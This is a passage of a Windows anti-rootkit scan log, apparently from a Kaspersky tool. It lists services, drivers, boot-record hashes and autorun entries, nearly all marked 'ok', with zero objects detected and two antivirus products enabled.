14:21:35.0168 0x1464 uliagpkx - ok 14:21:35.0168 0x1464 umbus - ok 14:21:35.0178 0x1464 UmPass - ok 14:21:35.0178 0x1464 upnphost - ok 
14:21:35.0188 0x1464 USBAAPL - ok 14:21:35.0188 0x1464 usbccgp - ok 14:21:35.0198 0x1464 usbcir - ok 14:21:35.0198 0x1464 usbehci - ok 14:21:35.0198 0x1464 usbhub - ok 14:21:35.0208 0x1464 usbohci - ok 14:21:35.0218 0x1464 usbprint - ok 14:21:35.0218 0x1464 usbser - ok 14:21:35.0218 0x1464 USBSTOR - ok 14:21:35.0228 0x1464 usbuhci - ok 14:21:35.0228 0x1464 UxSms - ok 14:21:35.0238 0x1464 VaultSvc - ok 14:21:35.0238 0x1464 vdrvroot - ok 14:21:35.0248 0x1464 vds - ok 14:21:35.0248 0x1464 vga - ok 14:21:35.0258 0x1464 VgaSave - ok 14:21:35.0258 0x1464 vhdmp - ok 14:21:35.0268 0x1464 viaagp - ok 14:21:35.0268 0x1464 ViaC7 - ok 14:21:35.0278 0x1464 viaide - ok 14:21:35.0278 0x1464 volmgr - ok 14:21:35.0288 0x1464 volmgrx - ok 14:21:35.0288 0x1464 volsnap - ok 14:21:35.0298 0x1464 vsmraid - ok 14:21:35.0298 0x1464 VSS - ok 14:21:35.0308 0x1464 vwifibus - ok 14:21:35.0308 0x1464 W32Time - ok 14:21:35.0318 0x1464 WacomPen - ok 14:21:35.0328 0x1464 WANARP - ok 14:21:35.0328 0x1464 Wanarpv6 - ok 14:21:35.0338 0x1464 wbengine - ok 14:21:35.0338 0x1464 WbioSrvc - ok 14:21:35.0348 0x1464 wcncsvc - ok 14:21:35.0348 0x1464 WcsPlugInService - ok 14:21:35.0358 0x1464 Wd - ok 14:21:35.0358 0x1464 Wdf01000 - ok 14:21:35.0368 0x1464 WdiServiceHost - ok 14:21:35.0368 0x1464 WdiSystemHost - ok 14:21:35.0368 0x1464 WebClient - ok 14:21:35.0378 0x1464 Wecsvc - ok 14:21:35.0378 0x1464 wercplsupport - ok 14:21:35.0388 0x1464 WerSvc - ok 14:21:35.0388 0x1464 WfpLwf - ok 14:21:35.0398 0x1464 WIMMount - ok 14:21:35.0398 0x1464 WinDefend - ok 14:21:35.0408 0x1464 WinHttpAutoProxySvc - ok 14:21:35.0418 0x1464 Winmgmt - ok 14:21:35.0418 0x1464 WinRM - ok 14:21:35.0428 0x1464 WinUsb - ok 14:21:35.0438 0x1464 Wlansvc - ok 14:21:35.0438 0x1464 WmiAcpi - ok 14:21:35.0448 0x1464 wmiApSrv - ok 14:21:35.0448 0x1464 WMPNetworkSvc - ok 14:21:35.0458 0x1464 WPCSvc - ok 14:21:35.0458 0x1464 WPDBusEnum - ok 14:21:35.0468 0x1464 ws2ifsl - ok 14:21:35.0468 0x1464 wscsvc - ok 14:21:35.0478 0x1464 WSearch - ok 
14:21:35.0478 0x1464 wuauserv - ok 14:21:35.0488 0x1464 WudfPf - ok 14:21:35.0488 0x1464 WUDFRd - ok 14:21:35.0498 0x1464 wudfsvc - ok 14:21:35.0498 0x1464 WwanSvc - ok 14:21:35.0508 0x1464 ================ Scan global =============================== 14:21:35.0508 0x1464 [ Global ] - ok 14:21:35.0508 0x1464 ================ Scan MBR ================================== 14:21:35.0518 0x1464 [ 1A99B0C38173685D1B523C354003C9E3 ] \Device\Harddisk0\DR0 14:21:35.0548 0x1464 \Device\Harddisk0\DR0 - ok 14:21:35.0548 0x1464 [ 7C450A019F04E81C9776B738009B5D5B ] \Device\Harddisk1\DR1 14:21:35.0648 0x1464 \Device\Harddisk1\DR1 - ok 14:21:35.0648 0x1464 ================ Scan VBR ================================== 14:21:35.0648 0x1464 [ 390AF4BC7B83C893F190184531B3682D ] \Device\Harddisk0\DR0\Partition1 14:21:35.0648 0x1464 \Device\Harddisk0\DR0\Partition1 - ok 14:21:35.0658 0x1464 [ 31C93D653D15AF28B70371B4EBA93022 ] \Device\Harddisk0\DR0\Partition2 14:21:35.0658 0x1464 \Device\Harddisk0\DR0\Partition2 - ok 14:21:35.0658 0x1464 [ 3F8A8185EA217D23FB7F4ECDF5029AE4 ] \Device\Harddisk1\DR1\Partition1 14:21:35.0658 0x1464 \Device\Harddisk1\DR1\Partition1 - ok 14:21:35.0668 0x1464 ================ Scan generic autorun ====================== 14:21:35.0668 0x1464 RtHDVCpl - ok 14:21:35.0668 0x1464 Skytel - ok 14:21:35.0668 0x1464 PCMService - ok 14:21:35.0668 0x1464 CanonMyPrinter - ok 14:21:35.0678 0x1464 NvBackend - ok 14:21:35.0678 0x1464 Trend Micro Client Framework - ok 14:21:35.0678 0x1464 Platinum - ok 14:21:35.0678 0x1464 avgnt - ok 14:21:35.0678 0x1464 Avira Systray - ok 14:21:35.0688 0x1464 Sidebar - ok 14:21:35.0688 0x1464 mctadmin - ok 14:21:35.0688 0x1464 Sidebar - ok 14:21:35.0688 0x1464 mctadmin - ok 14:21:35.0698 0x1464 IncrediMail - ok 14:21:35.0708 0x1464 AV detected via SS2: Avira Desktop, C:\Program Files\Avira\AntiVir Desktop\wsctool.exe ( 15.0.8.652 ), 0x41000 ( enabled : updated ) 14:21:35.0708 0x1464 AV detected via SS2: Trend Micro Internet Security, C:\Program 
Files\Trend Micro\Titanium\wschandler.exe ( 8.0.0.1192 ), 0x41000 ( enabled : updated ) 14:21:35.0708 0x1464 Win FW state via NFP2: enabled 14:21:38.0078 0x1464 ============================================================ 14:21:38.0078 0x1464 Scan finished 14:21:38.0078 0x1464 ============================================================ 14:21:38.0078 0x18ac Detected object count: 0 14:21:38.0088 0x18ac Actual detected object count: 0 14:26:39.0426 0x1a70 ============================================================ 14:26:39.0426 0x1a70 Scan started 14:26:39.0426 0x1a70 Mode: Manual; SigCheck; TDLFS; 14:26:39.0426 0x1a70 ============================================================ 14:26:39.0426 0x1a70 KSN ping started 14:26:53.0067 0x1a70 KSN ping finished: true 14:26:53.0227 0x1a70 ================ Scan system memory ======================== 14:26:53.0227 0x1a70 System memory - ok 14:26:53.0237 0x1a70 ================ Scan services ============================= 14:26:53.0247 0x1a70 1394ohci - ok 14:26:53.0257 0x1a70 ACPI - ok 14:26:53.0257 0x1a70 AcpiPmi - ok 14:26:53.0267 0x1a70 Adobe LM Service - ok 14:26:53.0267 0x1a70 AdobeARMservice - ok 14:26:53.0277 0x1a70 AdobeFlashPlayerUpdateSvc - ok 14:26:53.0277 0x1a70 adp94xx - ok 14:26:53.0287 0x1a70 adpahci - ok 14:26:53.0287 0x1a70 adpu320 - ok 14:26:53.0297 0x1a70 AeLookupSvc - ok 14:26:53.0297 0x1a70 AFD - ok 14:26:53.0307 0x1a70 agp440 - ok 14:26:53.0307 0x1a70 aic78xx - ok 14:26:53.0317 0x1a70 ALG - ok 14:26:53.0317 0x1a70 aliide - ok 14:26:53.0327 0x1a70 amdagp - ok 14:26:53.0327 0x1a70 amdide - ok 14:26:53.0337 0x1a70 AmdK8 - ok 14:26:53.0337 0x1a70 AmdPPM - ok 14:26:53.0347 0x1a70 amdsata - ok 14:26:53.0347 0x1a70 amdsbs - ok 14:26:53.0357 0x1a70 amdxata - ok 14:26:53.0357 0x1a70 Amsp - ok 14:26:53.0367 0x1a70 AntiVirSchedulerService - ok 14:26:53.0367 0x1a70 AntiVirService - ok 14:26:53.0377 0x1a70 AppID - ok 14:26:53.0377 0x1a70 AppIDSvc - ok 14:26:53.0387 0x1a70 Appinfo - ok 14:26:53.0387 0x1a70 Apple 
Mobile Device - ok 14:26:53.0397 0x1a70 arc - ok 14:26:53.0397 0x1a70 arcsas - ok 14:26:53.0407 0x1a70 aspnet_state - ok 14:26:53.0417 0x1a70 AsyncMac - ok 14:26:53.0417 0x1a70 atapi - ok 14:26:53.0417 0x1a70 AudioEndpointBuilder - ok 14:26:53.0427 0x1a70 Audiosrv - ok 14:26:53.0427 0x1a70 avgntflt - ok 14:26:53.0437 0x1a70 avipbb - ok 14:26:53.0437 0x1a70 Avira.OE.ServiceHost - ok 14:26:53.0447 0x1a70 avkmgr - ok 14:26:53.0447 0x1a70 AxInstSV - ok 14:26:53.0457 0x1a70 b06bdrv - ok 14:26:53.0457 0x1a70 b57nd60x - ok 14:26:53.0467 0x1a70 BDESVC - ok 14:26:53.0467 0x1a70 Beep - ok 14:26:53.0477 0x1a70 BFE - ok 14:26:53.0477 0x1a70 BITS - ok 14:26:53.0487 0x1a70 blbdrive - ok 14:26:53.0487 0x1a70 Bonjour Service - ok 14:26:53.0497 0x1a70 bowser - ok 14:26:53.0497 0x1a70 BrFiltLo - ok 14:26:53.0507 0x1a70 BrFiltUp - ok 14:26:53.0507 0x1a70 Browser - ok 14:26:53.0517 0x1a70 Brserid - ok 14:26:53.0517 0x1a70 BrSerWdm - ok 14:26:53.0527 0x1a70 BrUsbMdm - ok 14:26:53.0527 0x1a70 BrUsbSer - ok 14:26:53.0537 0x1a70 BTHMODEM - ok 14:26:53.0537 0x1a70 bthserv - ok 14:26:53.0547 0x1a70 cdfs - ok 14:26:53.0547 0x1a70 cdrom - ok 14:26:53.0557 0x1a70 CertPropSvc - ok 14:26:53.0557 0x1a70 circlass - ok 14:26:53.0567 0x1a70 CLCapSvc - ok 14:26:53.0567 0x1a70 CLFS - ok 14:26:53.0577 0x1a70 clr_optimization_v2.0.50727_32 - ok 14:26:53.0577 0x1a70 clr_optimization_v4.0.30319_32 - ok 14:26:53.0587 0x1a70 CLSched - ok 14:26:53.0587 0x1a70 CmBatt - ok 14:26:53.0597 0x1a70 cmdide - ok 14:26:53.0597 0x1a70 CNG - ok 14:26:53.0607 0x1a70 Compbatt - ok 14:26:53.0607 0x1a70 CompositeBus - ok 14:26:53.0617 0x1a70 COMSysApp - ok 14:26:53.0617 0x1a70 crcdisk - ok 14:26:53.0627 0x1a70 CryptSvc - ok 14:26:53.0627 0x1a70 CXAVSAUD - ok 14:26:53.0637 0x1a70 DcomLaunch - ok 14:26:53.0637 0x1a70 defragsvc - ok 14:26:53.0647 0x1a70 DfsC - ok 14:26:53.0647 0x1a70 Dhcp - ok 14:26:53.0657 0x1a70 discache - ok 14:26:53.0657 0x1a70 Disk - ok 14:26:53.0667 0x1a70 Dnscache - ok 14:26:53.0667 0x1a70 dot3svc - ok 
14:26:53.0677 0x1a70 DPS - ok 14:26:53.0677 0x1a70 drmkaud - ok 14:26:53.0687 0x1a70 DXGKrnl - ok 14:26:53.0687 0x1a70 EapHost - ok 14:26:53.0697 0x1a70 ebdrv - ok 14:26:53.0697 0x1a70 EFS - ok 14:26:53.0697 0x1a70 ehRecvr - ok 14:26:53.0707 0x1a70 ehSched - ok 14:26:53.0707 0x1a70 elxstor - ok 14:26:53.0717 0x1a70 ErrDev - ok 14:26:53.0727 0x1a70 EventSystem - ok 14:26:53.0727 0x1a70 exfat - ok 14:26:53.0737 0x1a70 fastfat - ok 14:26:53.0737 0x1a70 Fax - ok 14:26:53.0747 0x1a70 fdc - ok 14:26:53.0747 0x1a70 fdPHost - ok 14:26:53.0757 0x1a70 FDResPub - ok 14:26:53.0757 0x1a70 FileInfo - ok 14:26:53.0767 0x1a70 Filetrace - ok 14:26:53.0767 0x1a70 flpydisk - ok 14:26:53.0767 0x1a70 FltMgr - ok 14:26:53.0777 0x1a70 FontCache - ok 14:26:53.0777 0x1a70 FontCache3.0.0.0 - ok 14:26:53.0787 0x1a70 FsDepends - ok 14:26:53.0787 0x1a70 Fs_Rec - ok 14:26:53.0797 0x1a70 fvevol - ok 14:26:53.0797 0x1a70 gagp30kx - ok 14:26:53.0807 0x1a70 GEARAspiWDM - ok 14:26:53.0807 0x1a70 gpsvc - ok 14:26:53.0817 0x1a70 gupdate - ok 14:26:53.0817 0x1a70 gupdatem - ok 14:26:53.0827 0x1a70 HauppaugeTVServer - ok 14:26:53.0827 0x1a70 hcw85cir - ok 14:26:53.0837 0x1a70 hcw88bda - ok 14:26:53.0837 0x1a70 hcw88rc5 - ok 14:26:53.0837 0x1a70 HCW88TSE - ok 14:26:53.0847 0x1a70 hcw88vid - ok 14:26:53.0857 0x1a70 HdAudAddService - ok 14:26:53.0857 0x1a70 HDAudBus - ok 14:26:53.0867 0x1a70 HidBatt - ok 14:26:53.0867 0x1a70 HidBth - ok 14:26:53.0877 0x1a70 HidIr - ok 14:26:53.0877 0x1a70 hidserv - ok 14:26:53.0887 0x1a70 HidUsb - ok 14:26:53.0887 0x1a70 hkmsvc - ok 14:26:53.0897 0x1a70 HomeGroupListener - ok 14:26:53.0897 0x1a70 HomeGroupProvider - ok 14:26:53.0897 0x1a70 HpSAMD - ok 14:26:53.0907 0x1a70 HTTP - ok 14:26:53.0907 0x1a70 hwpolicy - ok 14:26:53.0917 0x1a70 i8042prt - ok 14:26:53.0917 0x1a70 iaStorV - ok 14:26:53.0927 0x1a70 idsvc - ok 14:26:53.0927 0x1a70 IEEtwCollectorService - ok 14:26:53.0937 0x1a70 iirsp - ok 14:26:53.0937 0x1a70 IKEEXT - ok 14:26:53.0947 0x1a70 IntcAzAudAddService - ok 
14:26:53.0947 0x1a70 intelide - ok 14:26:53.0957 0x1a70 intelppm - ok 14:26:53.0957 0x1a70 IPBusEnum - ok 14:26:53.0967 0x1a70 IpFilterDriver - ok 14:26:53.0967 0x1a70 iphlpsvc - ok 14:26:53.0977 0x1a70 IPMIDRV - ok 14:26:53.0977 0x1a70 IPNAT - ok 14:26:53.0987 0x1a70 iPod Service - ok 14:26:53.0987 0x1a70 IRENUM - ok 14:26:53.0997 0x1a70 isapnp - ok 14:26:53.0997 0x1a70 iScsiPrt - ok 14:26:54.0007 0x1a70 kbdclass - ok 14:26:54.0007 0x1a70 kbdhid - ok 14:26:54.0017 0x1a70 KeyIso - ok 14:26:54.0017 0x1a70 KSecDD - ok 14:26:54.0017 0x1a70 KSecPkg - ok 14:26:54.0027 0x1a70 KtmRm - ok 14:26:54.0027 0x1a70 L1E - ok 14:26:54.0037 0x1a70 LanmanServer - ok 14:26:54.0037 0x1a70 LanmanWorkstation - ok 14:26:54.0047 0x1a70 lltdio - ok 14:26:54.0057 0x1a70 lltdsvc - ok 14:26:54.0057 0x1a70 lmhosts - ok 14:26:54.0067 0x1a70 LSI_FC - ok 14:26:54.0067 0x1a70 LSI_SAS - ok 14:26:54.0077 0x1a70 LSI_SAS2 - ok 14:26:54.0077 0x1a70 LSI_SCSI - ok 14:26:54.0087 0x1a70 luafv - ok 14:26:54.0087 0x1a70 MBAMProtector - ok 14:26:54.0097 0x1a70 MBAMScheduler - ok 14:26:54.0097 0x1a70 MBAMService - ok 14:26:54.0107 0x1a70 MBAMSwissArmy - ok 14:26:54.0107 0x1a70 MBAMWebAccessControl - ok 14:26:54.0117 0x1a70 Mcx2Svc - ok 14:26:54.0117 0x1a70 megasas - ok 14:26:54.0127 0x1a70 MegaSR - ok 14:26:54.0127 0x1a70 MMCSS - ok 14:26:54.0137 0x1a70 Modem - ok 14:26:54.0137 0x1a70 monitor - ok 14:26:54.0137 0x1a70 mouclass - ok 14:26:54.0147 0x1a70 mouhid - ok 14:26:54.0147 0x1a70 mountmgr - ok 14:26:54.0157 0x1a70 MozillaMaintenance - ok 14:26:54.0167 0x1a70 mpio - ok 14:26:54.0167 0x1a70 mpsdrv - ok 14:26:54.0177 0x1a70 MpsSvc - ok 14:26:54.0177 0x1a70 MRxDAV - ok 14:26:54.0187 0x1a70 mrxsmb - ok 14:26:54.0187 0x1a70 mrxsmb10 - ok 14:26:54.0197 0x1a70 mrxsmb20 - ok 14:26:54.0197 0x1a70 msahci - ok 14:26:54.0197 0x1a70 msdsm - ok 14:26:54.0207 0x1a70 MSDTC - ok 14:26:54.0217 0x1a70 Msfs - ok 14:26:54.0217 0x1a70 mshidkmdf - ok 14:26:54.0227 0x1a70 msisadrv - ok 14:26:54.0227 0x1a70 MSiSCSI - ok 
14:26:54.0237 0x1a70 msiserver - ok 14:26:54.0237 0x1a70 MSKSSRV - ok 14:26:54.0247 0x1a70 MSPCLOCK - ok 14:26:54.0247 0x1a70 MSPQM - ok 14:26:54.0247 0x1a70 MsRPC - ok 14:26:54.0257 0x1a70 mssmbios - ok 14:26:54.0267 0x1a70 MSTEE - ok 14:26:54.0267 0x1a70 MTConfig - ok 14:26:54.0277 0x1a70 MTsensor - ok 14:26:54.0277 0x1a70 Mup - ok 14:26:54.0287 0x1a70 napagent - ok 14:26:54.0287 0x1a70 NativeWifiP - ok 14:26:54.0297 0x1a70 NDIS - ok 14:26:54.0297 0x1a70 NdisCap - ok 14:26:54.0297 0x1a70 NdisTapi - ok 14:26:54.0307 0x1a70 Ndisuio - ok 14:26:54.0307 0x1a70 NdisWan - ok 14:26:54.0317 0x1a70 NDProxy - ok 14:26:54.0317 0x1a70 NetBIOS - ok 14:26:54.0327 0x1a70 NetBT - ok 14:26:54.0327 0x1a70 Netlogon - ok 14:26:54.0337 0x1a70 Netman - ok 14:26:54.0337 0x1a70 NetMsmqActivator - ok 14:26:54.0347 0x1a70 NetPipeActivator - ok 14:26:54.0347 0x1a70 netprofm - ok 14:26:54.0357 0x1a70 NetTcpActivator - ok 14:26:54.0357 0x1a70 NetTcpPortSharing - ok 14:26:54.0367 0x1a70 nfrd960 - ok 14:26:54.0367 0x1a70 NlaSvc - ok 14:26:54.0377 0x1a70 NPF - ok 14:26:54.0377 0x1a70 Npfs - ok 14:26:54.0387 0x1a70 nsi - ok 14:26:54.0387 0x1a70 nsiproxy - ok 14:26:54.0397 0x1a70 Ntfs - ok 14:26:54.0397 0x1a70 Null - ok 14:26:54.0407 0x1a70 nvlddmkm - ok 14:26:54.0407 0x1a70 nvraid - ok 14:26:54.0417 0x1a70 nvstor - ok 14:26:54.0417 0x1a70 nvsvc - ok 14:26:54.0427 0x1a70 nv_agp - ok 14:26:54.0427 0x1a70 ohci1394 - ok 14:26:54.0437 0x1a70 ose - ok 14:26:54.0437 0x1a70 p2pimsvc - ok 14:26:54.0447 0x1a70 p2psvc - ok 14:26:54.0447 0x1a70 Parport - ok 14:26:54.0447 0x1a70 partmgr - ok 14:26:54.0457 0x1a70 Parvdm - ok 14:26:54.0457 0x1a70 PcaSvc - ok 14:26:54.0467 0x1a70 pci - ok 14:26:54.0467 0x1a70 pciide - ok 14:26:54.0477 0x1a70 pcmcia - ok 14:26:54.0477 0x1a70 pcw - ok 14:26:54.0487 0x1a70 PDF Architect 2 Creator - ok 14:26:54.0487 0x1a70 PEAUTH - ok 14:26:54.0507 0x1a70 PGPdisk - ok 14:26:54.0507 0x1a70 pgpfs - ok 14:26:54.0517 0x1a70 PGPsdkDriver - ok 14:26:54.0527 0x1a70 PGPserv - ok 
14:26:54.0527 0x1a70 PGPwded - ok 14:26:54.0537 0x1a70 Pgpwdefs - ok 14:26:54.0537 0x1a70 pla - ok 14:26:54.0547 0x1a70 Platinum Host Service - ok 14:26:54.0547 0x1a70 PlugPlay - ok 14:26:54.0547 0x1a70 PNRPAutoReg - ok 14:26:54.0557 0x1a70 PNRPsvc - ok 14:26:54.0567 0x1a70 PolicyAgent - ok 14:26:54.0567 0x1a70 Power - ok 14:26:54.0577 0x1a70 PptpMiniport - ok 14:26:54.0577 0x1a70 Processor - ok 14:26:54.0587 0x1a70 ProfSvc - ok 14:26:54.0587 0x1a70 ProtectedStorage - ok 14:26:54.0597 0x1a70 Psched - ok 14:26:54.0597 0x1a70 ql2300 - ok 14:26:54.0607 0x1a70 ql40xx - ok 14:26:54.0607 0x1a70 QWAVE - ok 14:26:54.0617 0x1a70 QWAVEdrv - ok 14:26:54.0617 0x1a70 RasAcd - ok 14:26:54.0627 0x1a70 RasAgileVpn - ok 14:26:54.0627 0x1a70 RasAuto - ok 14:26:54.0637 0x1a70 Rasl2tp - ok 14:26:54.0637 0x1a70 RasMan - ok 14:26:54.0637 0x1a70 RasPppoe - ok 14:26:54.0647 0x1a70 RasSstp - ok 14:26:54.0647 0x1a70 rdbss - ok 14:26:54.0657 0x1a70 rdpbus - ok 14:26:54.0657 0x1a70 RDPCDD - ok 14:26:54.0667 0x1a70 RDPENCDD - ok 14:26:54.0677 0x1a70 RDPREFMP - ok 14:26:54.0687 0x1a70 RdpVideoMiniport - ok 14:26:54.0687 0x1a70 RDPWD - ok 14:26:54.0697 0x1a70 rdyboost - ok 14:26:54.0697 0x1a70 RemoteAccess - ok 14:26:54.0697 0x1a70 RemoteRegistry - ok 14:26:54.0707 0x1a70 RichVideo - ok 14:26:54.0707 0x1a70 rpcapd - ok 14:26:54.0717 0x1a70 RpcEptMapper - ok 14:26:54.0717 0x1a70 RpcLocator - ok 14:26:54.0727 0x1a70 RpcSs - ok 14:26:54.0727 0x1a70 rspndr - ok 14:26:54.0737 0x1a70 SamSs - ok 14:26:54.0737 0x1a70 sbp2port - ok 14:26:54.0747 0x1a70 SCardSvr - ok 14:26:54.0747 0x1a70 scfilter - ok 14:26:54.0757 0x1a70 Schedule - ok 14:26:54.0757 0x1a70 SCPolicySvc - ok 14:26:54.0767 0x1a70 SDRSVC - ok 14:26:54.0767 0x1a70 secdrv - ok 14:26:54.0767 0x1a70 seclogon - ok 14:26:54.0777 0x1a70 SENS - ok 14:26:54.0777 0x1a70 SensrSvc - ok 14:26:54.0787 0x1a70 Serenum - ok 14:26:54.0787 0x1a70 Serial - ok 14:26:54.0797 0x1a70 sermouse - ok 14:26:54.0807 0x1a70 SessionEnv - ok 14:26:54.0807 0x1a70 sffdisk - 
ok 14:26:54.0817 0x1a70 sffp_mmc - ok 14:26:54.0817 0x1a70 sffp_sd - ok 14:26:54.0827 0x1a70 sfloppy - ok 14:26:54.0827 0x1a70 SharedAccess - ok 14:26:54.0837 0x1a70 ShellHWDetection - ok 14:26:54.0837 0x1a70 sisagp - ok 14:26:54.0837 0x1a70 SiSRaid2 - ok 14:26:54.0847 0x1a70 SiSRaid4 - ok 14:26:54.0847 0x1a70 Smb - ok 14:26:54.0857 0x1a70 SNMPTRAP - ok 14:26:54.0867 0x1a70 spldr - ok 14:26:54.0867 0x1a70 Spooler - ok 14:26:54.0877 0x1a70 sppsvc - ok 14:26:54.0877 0x1a70 sppuinotify - ok 14:26:54.0887 0x1a70 srv - ok 14:26:54.0887 0x1a70 srv2 - ok 14:26:54.0897 0x1a70 srvnet - ok 14:26:54.0897 0x1a70 SSDPSRV - ok 14:26:54.0897 0x1a70 ssmdrv - ok 14:26:54.0907 0x1a70 SstpSvc - ok 14:26:54.0907 0x1a70 Stereo Service - ok 14:26:54.0917 0x1a70 stexstor - ok 14:26:54.0917 0x1a70 StillCam - ok 14:26:54.0927 0x1a70 StiSvc - ok 14:26:54.0927 0x1a70 swenum - ok 14:26:54.0937 0x1a70 swprv - ok 14:26:54.0937 0x1a70 SysMain - ok 14:26:54.0947 0x1a70 TabletInputService - ok 14:26:54.0947 0x1a70 TapiSrv - ok 14:26:54.0957 0x1a70 TBS - ok 14:26:54.0957 0x1a70 Tcpip - ok 14:26:54.0967 0x1a70 TCPIP6 - ok 14:26:54.0967 0x1a70 tcpipreg - ok 14:26:54.0977 0x1a70 TDPIPE - ok 14:26:54.0977 0x1a70 TDTCP - ok 14:26:54.0987 0x1a70 tdx - ok 14:26:54.0987 0x1a70 TeamViewer - ok 14:26:54.0997 0x1a70 TermDD - ok 14:26:54.0997 0x1a70 TermService - ok 14:26:55.0007 0x1a70 Themes - ok 14:26:55.0007 0x1a70 THREADORDER - ok 14:26:55.0017 0x1a70 tmactmon - ok 14:26:55.0017 0x1a70 tmcomm - ok 14:26:55.0027 0x1a70 TMEBC - ok 14:26:55.0027 0x1a70 tmeevw - ok 14:26:55.0037 0x1a70 tmevtmgr - ok 14:26:55.0037 0x1a70 tmnciesc - ok 14:26:55.0047 0x1a70 tmusa - ok 14:26:55.0047 0x1a70 TrkWks - ok 14:26:55.0057 0x1a70 truecrypt - ok 14:26:55.0057 0x1a70 TrustedInstaller - ok 14:26:55.0067 0x1a70 tssecsrv - ok 14:26:55.0067 0x1a70 TsUsbFlt - ok 14:26:55.0077 0x1a70 TsUsbGD - ok 14:26:55.0077 0x1a70 tunnel - ok 14:26:55.0087 0x1a70 uagp35 - ok 14:26:55.0087 0x1a70 udfs - ok 14:26:55.0097 0x1a70 UI0Detect - ok 
14:26:55.0107 0x1a70 uliagpkx - ok 14:26:55.0107 0x1a70 umbus - ok 14:26:55.0117 0x1a70 UmPass - ok 14:26:55.0117 0x1a70 upnphost - ok 14:26:55.0127 0x1a70 USBAAPL - ok 14:26:55.0127 0x1a70 usbccgp - ok 14:26:55.0127 0x1a70 usbcir - ok 14:26:55.0137 0x1a70 usbehci - ok 14:26:55.0137 0x1a70 usbhub - ok 14:26:55.0147 0x1a70 usbohci - ok 14:26:55.0147 0x1a70 usbprint - ok 14:26:55.0157 0x1a70 usbser - ok 14:26:55.0157 0x1a70 USBSTOR - ok 14:26:55.0167 0x1a70 usbuhci - ok 14:26:55.0167 0x1a70 UxSms - ok 14:26:55.0177 0x1a70 VaultSvc - ok 14:26:55.0177 0x1a70 vdrvroot - ok 14:26:55.0187 0x1a70 vds - ok 14:26:55.0187 0x1a70 vga - ok 14:26:55.0187 0x1a70 VgaSave - ok 14:26:55.0197 0x1a70 vhdmp - ok 14:26:55.0197 0x1a70 viaagp - ok 14:26:55.0207 0x1a70 ViaC7 - ok 14:26:55.0207 0x1a70 viaide - ok 14:26:55.0217 0x1a70 volmgr - ok 14:26:55.0217 0x1a70 volmgrx - ok 14:26:55.0227 0x1a70 volsnap - ok 14:26:55.0227 0x1a70 vsmraid - ok 14:26:55.0237 0x1a70 VSS - ok 14:26:55.0237 0x1a70 vwifibus - ok 14:26:55.0247 0x1a70 W32Time - ok 14:26:55.0247 0x1a70 WacomPen - ok 14:26:55.0257 0x1a70 WANARP - ok 14:26:55.0257 0x1a70 Wanarpv6 - ok 14:26:55.0267 0x1a70 wbengine - ok 14:26:55.0267 0x1a70 WbioSrvc - ok 14:26:55.0277 0x1a70 wcncsvc - ok 14:26:55.0277 0x1a70 WcsPlugInService - ok 14:26:55.0287 0x1a70 Wd - ok 14:26:55.0287 0x1a70 Wdf01000 - ok 14:26:55.0297 0x1a70 WdiServiceHost - ok 14:26:55.0297 0x1a70 WdiSystemHost - ok 14:26:55.0307 0x1a70 WebClient - ok 14:26:55.0307 0x1a70 Wecsvc - ok 14:26:55.0317 0x1a70 wercplsupport - ok 14:26:55.0317 0x1a70 WerSvc - ok 14:26:55.0317 0x1a70 WfpLwf - ok 14:26:55.0327 0x1a70 WIMMount - ok 14:26:55.0327 0x1a70 WinDefend - ok 14:26:55.0337 0x1a70 WinHttpAutoProxySvc - ok 14:26:55.0347 0x1a70 Winmgmt - ok 14:26:55.0347 0x1a70 WinRM - ok 14:26:55.0357 0x1a70 WinUsb - ok 14:26:55.0367 0x1a70 Wlansvc - ok 14:26:55.0367 0x1a70 WmiAcpi - ok 14:26:55.0377 0x1a70 wmiApSrv - ok 14:26:55.0377 0x1a70 WMPNetworkSvc - ok 14:26:55.0387 0x1a70 WPCSvc - ok 
14:26:55.0387 0x1a70 WPDBusEnum - ok
14:26:55.0397 0x1a70 ws2ifsl - ok
14:26:55.0397 0x1a70 wscsvc - ok
14:26:55.0407 0x1a70 WSearch - ok
14:26:55.0407 0x1a70 wuauserv - ok
14:26:55.0417 0x1a70 WudfPf - ok
14:26:55.0417 0x1a70 WUDFRd - ok
14:26:55.0427 0x1a70 wudfsvc - ok
14:26:55.0427 0x1a70 WwanSvc - ok
14:26:55.0437 0x1a70 ================ Scan global ===============================
14:26:55.0437 0x1a70 [ Global ] - ok
14:26:55.0437 0x1a70 ================ Scan MBR ==================================
14:26:55.0447 0x1a70 [ 1A99B0C38173685D1B523C354003C9E3 ] \Device\Harddisk0\DR0
14:26:55.0477 0x1a70 \Device\Harddisk0\DR0 - ok
14:26:55.0477 0x1a70 [ 7C450A019F04E81C9776B738009B5D5B ] \Device\Harddisk1\DR1
14:26:55.0507 0x1a70 \Device\Harddisk1\DR1 - ok
14:26:55.0507 0x1a70 ================ Scan VBR ==================================
14:26:55.0517 0x1a70 [ 390AF4BC7B83C893F190184531B3682D ] \Device\Harddisk0\DR0\Partition1
14:26:55.0517 0x1a70 \Device\Harddisk0\DR0\Partition1 - ok
14:26:55.0517 0x1a70 [ 31C93D653D15AF28B70371B4EBA93022 ] \Device\Harddisk0\DR0\Partition2
14:26:55.0517 0x1a70 \Device\Harddisk0\DR0\Partition2 - ok
14:26:55.0527 0x1a70 [ 3F8A8185EA217D23FB7F4ECDF5029AE4 ] \Device\Harddisk1\DR1\Partition1
14:26:55.0527 0x1a70 \Device\Harddisk1\DR1\Partition1 - ok
14:26:55.0527 0x1a70 ================ Scan generic autorun ======================
14:26:55.0527 0x1a70 RtHDVCpl - ok
14:26:55.0527 0x1a70 Skytel - ok
14:26:55.0527 0x1a70 PCMService - ok
14:26:55.0537 0x1a70 CanonMyPrinter - ok
14:26:55.0537 0x1a70 NvBackend - ok
14:26:55.0537 0x1a70 Trend Micro Client Framework - ok
14:26:55.0537 0x1a70 Platinum - ok
14:26:55.0537 0x1a70 avgnt - ok
14:26:55.0547 0x1a70 Avira Systray - ok
14:26:55.0547 0x1a70 Sidebar - ok
14:26:55.0547 0x1a70 mctadmin - ok
14:26:55.0547 0x1a70 Sidebar - ok
14:26:55.0547 0x1a70 mctadmin - ok
14:26:55.0557 0x1a70 IncrediMail - ok
14:26:55.0567 0x1a70 AV detected via SS2: Avira Desktop, C:\Program Files\Avira\AntiVir Desktop\wsctool.exe ( 15.0.8.652 ), 0x41000 ( enabled : updated )
14:26:55.0567 0x1a70 AV detected via SS2: Trend Micro Internet Security, C:\Program Files\Trend Micro\Titanium\wschandler.exe ( 8.0.0.1192 ), 0x41000 ( enabled : updated )
14:26:55.0567 0x1a70 Win FW state via NFP2: enabled
